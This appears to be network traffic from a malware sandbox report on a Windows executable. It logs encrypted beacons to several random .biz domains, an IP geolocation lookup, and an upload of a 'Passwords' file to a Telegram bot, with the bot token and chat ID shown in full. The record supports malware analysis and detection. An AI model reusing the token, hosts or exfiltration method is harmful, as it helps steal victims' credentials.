Jan 10, 2025 21:41:35.542201042 CET	825	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 20:41:35 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ZgouahUTjuYFos+Dd4AZVAUmb0X/OcQpooepo3IKIURuTlyap8w4yVwFfqG+N+a3HnyOVdHlbddNM0gk8rKWpQ== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked
Jan 10, 2025 21:41:35.542227983 CET	1236	IN	Data Raw: 33 64 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 Data Ascii: 3db2<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ZgouahUTjuYFos+Dd4AZVAUmb0X/OcQpooepo3IKIURuTlyap8w4yVwFfqG+N+a3HnyOV
Jan 10, 2025 21:41:35.542279959 CET	224	IN	Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
Jan 10, 2025 21:41:35.542290926 CET	1236	IN	Data Raw: 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:
Jan 10, 2025 21:41:35.542303085 CET	1236	IN	Data Raw: 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
Jan 10, 2025 21:41:35.542316914 CET	164	IN	Data Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73 Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC
Jan 10, 2025 21:41:35.542372942 CET	1236	IN	Data Raw: 39 7a 64 6d 63 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 51 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 79 4e 43 41 79 4e 43 49 67 64 32 6c 6b 64 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 Data Ascii: 9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> <meta name="og:descript
Jan 10, 2025 21:41:35.542387009 CET	224	IN	Data Raw: 30 2c 6d 65 6e 75 62 61 72 3d 6e 6f 2c 73 74 61 74 75 73 3d 79 65 73 2c 74 6f 6f 6c 62 61 72 3d 6e 6f 27 29 2e 66 6f 63 75 73 28 29 22 20 63 6c 61 73 73 3d 22 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 22 3e 0a 20 20 20 20 50 72 69 76 61 63 79 20 Data Ascii: 0,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privacy Policy</a><br/><br/><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Requ
Jan 10, 2025 21:41:35.542401075 CET	1236	IN	Data Raw: 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 61 69 6e 65 72 27 3a 20 27 74 63 27 2c 0a 20 20 20 20 20 20 20 20 27 74 79 70 65 27 3a 20 27 72 65 6c 61 74 65 64 73 65 61 72 63 68 27 2c 0a 20 20 20 20 20 20 Data Ascii: ired and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fon
Jan 10, 2025 21:41:35.542412996 CET	1236	IN	Data Raw: 46 75 55 47 56 77 63 47 56 79 62 57 6c 75 64 45 4a 73 59 57 4e 72 66 48 77 31 59 32 55 34 4e 48 78 69 64 57 4e 72 5a 58 51 77 4e 6a 5a 38 66 48 78 38 66 48 77 32 4e 7a 67 78 4f 44 56 6d 5a 6a 56 6b 5a 44 67 33 66 48 78 38 4d 54 63 7a 4e 6a 55 30 Data Ascii: FuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVkZDg3fHx8MTczNjU0MTY5NS40MzI3fDkwZTMwM2NjZTM4YmY5MWQ4NGUwZGRjMmU2OTVhZjQ4Y2VkNWJlMWR8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVRKZk0zQm98YWQ3M2E5NjdiN
Jan 10, 2025 21:41:35.547261953 CET	1236	IN	Data Raw: 72 69 62 75 74 69 6f 6e 27 3a 20 27 61 72 69 61 6c 27 2c 27 61 64 4c 6f 61 64 65 64 43 61 6c 6c 62 61 63 6b 27 3a 20 66 75 6e 63 74 69 6f 6e 28 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 2c 20 61 64 73 4c 6f 61 64 65 64 2c 20 69 73 45 78 70 65 72 69 Data Ascii: ribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callbackOptions: callbackOp
Jan 10, 2025 21:41:35.890352011 CET	357	OUT	GET /sbjeah?usid=27&utid=10450772717 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Jan 10, 2025 21:41:36.190814018 CET	1236	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 20:41:36 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fPluTowHuRJR/A0zMyZK23DtC8JiGnRFE4PXRqGWjxyzpIZoMCCgY63+lYELCQ3pTPXZzA1luixgfGtv8xJFpA== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked Data Raw: 33 64 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 66 50 6c 75 54 6f 77 48 75 52 4a 52 2f 41 30 7a 4d 79 5a 4b 32 33 44 74 43 38 4a 69 47 6e 52 46 45 34 50 58 52 71 47 57 6a 78 79 7a 70 49 5a 6f 4d 43 43 67 59 36 33 2b 6c 59 45 4c 43 51 33 70 54 50 58 5a 7a 41 31 6c 75 69 78 67 66 47 74 76 38 78 4a 46 70 41 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED] Data Ascii: 3db2<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fPluTowHuRJR/A0zMyZK23DtC8JiGnRFE4PXRqGWjxyzpIZoMCCgY63+lYELCQ3pTPXZzA1luixgfGtv8xJFpA==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="vie

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:36.403197050 CET	350	OUT	POST /ebncgq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:36.403213978 CET	850	OUT	Data Raw: 03 60 a8 e3 69 e9 27 61 46 03 00 00 63 f4 93 bb 78 48 37 7d 28 17 70 be e8 a1 c9 17 23 62 65 15 29 93 89 61 5d cb 0e 60 eb bd 22 3f 85 a0 d3 42 c3 91 d1 21 9b 32 82 7a 8d 5f ed 55 8f 45 96 e2 e7 3f ab ca a0 d3 5b cd e9 31 09 4d 00 af 86 f7 e2 2a Data Ascii: `i'aFcxH7}(p#be)a]`"?B!2z_UE?[1M*z>21/;o6~:U_.oEiy<Ov#90 4T,CiCW:[9/!UEN}ar. .Ain'q7#}B/\|ED)

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:37.704047918 CET	352	OUT	POST /wmfptllh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:37.704093933 CET	850	OUT	Data Raw: d7 96 64 49 61 b5 10 67 46 03 00 00 0e 2d d6 e6 d4 df 9f 06 d0 1d 6e b8 ec c6 a9 55 4d 0c c6 5c 9a 78 99 e6 1a 65 6b 59 bf 62 fd 6f 23 63 d8 f2 46 98 76 9f 2a 95 5a 41 9e 6a bf d8 84 1a 7f 1f e4 96 92 3d fa 9b f5 c2 1f 1a 08 85 5f da 2e d1 ac 74 Data Ascii: dIagF-nUM\xekYbo#cFv*ZAj=_.thxEI'q#}Jf3!D'Z3ZR G=D)$-k>sX1RhDE4%93d53wIW)]T{(&<>OV$x\|{
Jan 10, 2025 21:41:39.103491068 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:41:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=13a1688657557e01ade43d400867a228\|8.46.123.189\|1736541698\|1736541698\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:41:39.457382917 CET	346	OUT	POST /xuri HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:41:39.457396984 CET	850	OUT	Data Raw: c1 d4 7a 55 0a 0c d7 71 46 03 00 00 a5 b6 93 04 f3 e9 47 79 cb 84 13 91 0d 13 c5 86 9b 2a 9b c7 81 5b 5c 9b 5e 5a 91 cb 6a a6 be ea 2a f7 bb 85 5d 7e f7 25 eb 0d a4 4f 90 70 02 b4 1d c5 2b aa 9f 09 cf 38 2a 5b 1a 23 65 6f a7 7d a6 84 ff 55 a2 d7 Data Ascii: zUqFGy[\^Zj]~%Op+8[#eo}UGCXYH@3c#R+lVA2s[H06<@pJ~,!F+gE;bMKU)huB4c HQ=Y~5N `y~0%J:chHY

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:42:01.433628082 CET	354	OUT	POST /jnemakkqdmxs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:42:01.433671951 CET	850	OUT	Data Raw: 9b 44 7e 5d 8a 59 d8 c1 46 03 00 00 30 c1 c4 be 57 1b fe 77 f5 0a 57 94 f4 94 9e 01 d3 26 ee b4 1a 7f 14 c9 5b 74 87 d4 de 2f 80 30 aa 97 7e bd 3f 69 18 b2 11 1f b7 c1 83 90 cc 33 7d 70 fd 45 99 1f 2b 7a be a4 f5 f6 3f 32 e6 bd 60 7a 77 07 91 ba Data Ascii: D~]YF0WwW&[t/0~?i3}pE+z?2`zw[rGW5:{YIE5s:a4\~3/d/+<y=+@B*+JXYrDmY+C32+jN=2>#kXO~f$,u

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:42:22.777595997 CET	356	OUT	POST /bcwwcxayhua HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:42:22.777622938 CET	850	OUT	Data Raw: 0b 0f 7a 45 70 3c 1e 13 46 03 00 00 dd 46 d7 b2 f8 62 5e 69 29 49 59 bc 72 47 47 51 8f c6 a8 60 69 96 74 0f 15 08 c9 fa 31 2a 8a 2a 6b 60 b0 76 0f b5 70 09 4f 4e 5f 08 ff 0a d4 d6 79 31 d7 f5 b1 0a fb 06 53 2e af 47 5e ba 1f df ca 96 a2 d0 59 a2 Data Ascii: zEp<FFb^i)IYrGGQ`it1**k`vpON_y1S.G^Yx{28Br;UvD%SO[1c)cHOh1Sl2~clbw!Ai<"z}cep!KznwGH"_4i^;

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:42:44.891060114 CET	361	OUT	POST /rgnicitetktmnuug HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Jan 10, 2025 21:42:44.891087055 CET	850	OUT	Data Raw: 2f 82 99 54 8d 4f b5 b1 46 03 00 00 55 0e 1e 70 86 7d 13 1f 10 a6 24 19 dd f6 2c 3b f9 f9 e9 a6 19 a0 53 05 8c a8 0b 6a 89 b4 13 1e 9b 34 da 5e fe 52 6a cc e3 ab c7 f5 ec dc c5 d5 cb 5d 7f 2a c9 f3 ea 10 ac a3 56 60 f1 49 bb cd 57 d7 4a 77 e3 ff Data Ascii: /TOFUp}$,;Sj4^Rj]*V`IWJwK0</K4?Nbpoh]Yy!]6' b~[h<IZl0bb/8>C_w&qLqKZYlTrj1CzWS[0"qsDN

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:40:55 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 20:40:55 UTC	869	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:40:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1856444 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6ytFjVqt9gPGH%2BQHt6WfL35Cle%2Fn%2F0bAxsPR7z%2F%2BWdTXW71CpBe2O95O5%2BVLy7Twpzdv%2FIGdWVaDRSbt1yUN4LoTFTk34VGhx%2FcLymdcjIFaHW0pxEST21Cyx5e%2Bn%2F7xd8SSZeg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff7c249cbbde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1606&rtt_var=817&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1184584&cwnd=243&unsent_bytes=0&cid=c481b55eaece08be&ts=217&x=0"
2025-01-10 20:40:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:41:03 UTC	295	OUT	POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd318d2fbe638d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:41:03 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 64 32 66 62 65 36 33 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd318d2fbe638dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:41:04 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:41:04 GMT Content-Type: application/json Content-Length: 515 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:41:04 UTC	515	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 39 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 31 34 31 35 36 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 33 37 35 35 30 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6d 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 36 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 Data Ascii: {"ok":true,"result":{"message_id":2960,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1736541664,"document":{"file_name":"Userdata.txt","mime_t

Target ID:	0
Start time:	15:40:38
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\SABXJ1B5c8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SABXJ1B5c8.exe"
Imagebase:	0x400000
File size:	1'566'208 bytes
MD5 hash:	5742AB086DC8F6E149625CB4AF899678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true